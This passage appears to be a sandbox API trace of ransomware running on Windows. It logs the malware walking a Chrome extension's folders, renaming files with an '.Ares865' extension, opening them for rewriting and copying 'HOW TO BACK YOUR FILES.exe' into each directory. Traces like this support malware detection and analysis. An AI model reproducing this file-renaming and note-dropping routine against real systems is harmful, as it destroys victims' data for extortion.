lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eaf4e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eaf4e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.506] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.506] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.506] lstrcpyW (in: lpString1=0x2cce516, lpString2="verified_contents.json" | out: lpString1="verified_contents.json") returned="verified_contents.json" [0102.506] lstrlenW (lpString="verified_contents.json") returned 22 [0102.506] lstrlenW (lpString="Ares865") returned 7 [0102.506] lstrcmpiW (lpString1="ts.json", lpString2="Ares865") returned 1 [0102.506] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.Ares865") returned 169 [0102.506] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.ares865"), dwFlags=0x1) returned 1 [0102.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.508] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10089) returned 1 [0102.511] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales" [0102.511] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales" [0102.511] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.511] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.512] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.512] GetLastError () returned 0x0 [0102.513] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.513] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eaf4e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eaf4e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.513] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.513] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.513] lstrcpyW (in: lpString1=0x2cce514, lpString2="ar" | out: lpString1="ar") returned="ar" [0102.513] lstrcpyW (in: lpString1=0x2cce514, lpString2="bg" | out: lpString1="bg") returned="bg" [0102.513] lstrcpyW (in: lpString1=0x2cce514, lpString2="ca" | out: lpString1="ca") returned="ca" [0102.513] lstrcpyW (in: lpString1=0x2cce514, lpString2="cs" | out: lpString1="cs") returned="cs" [0102.513] lstrcpyW (in: lpString1=0x2cce514, lpString2="da" | out: lpString1="da") returned="da" [0102.513] lstrcpyW (in: lpString1=0x2cce514, lpString2="de" | out: lpString1="de") returned="de" [0102.514] lstrcpyW (in: lpString1=0x2cce514, lpString2="el" | out: lpString1="el") returned="el" [0102.514] lstrcpyW (in: lpString1=0x2cce514, lpString2="en" | out: lpString1="en") returned="en" [0102.514] lstrcpyW (in: lpString1=0x2cce514, lpString2="es" | out: lpString1="es") returned="es" [0102.514] lstrcpyW (in: lpString1=0x2cce514, lpString2="fi" | out: lpString1="fi") returned="fi" [0102.514] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW" [0102.514] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW" [0102.514] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.515] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.515] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.515] GetLastError () returned 0x0 [0102.516] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.516] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb1af60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb1af60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.516] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.516] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.516] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.Ares865") returned 165 [0102.516] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.518] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.522] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN" [0102.522] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN" [0102.522] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.522] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.522] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.523] GetLastError () returned 0x0 [0102.523] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.523] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb1af60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb1af60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.523] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.523] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.523] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.Ares865") returned 165 [0102.523] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.525] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.525] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.530] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi" [0102.530] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi" [0102.530] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.530] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.531] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.531] GetLastError () returned 0x0 [0102.531] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.531] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb1af60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb1af60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.532] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.532] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.532] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.Ares865") returned 162 [0102.532] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.533] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.538] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk" [0102.538] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk" [0102.538] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.538] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.539] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.539] GetLastError () returned 0x0 [0102.539] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.539] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb1af60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb1af60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.540] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 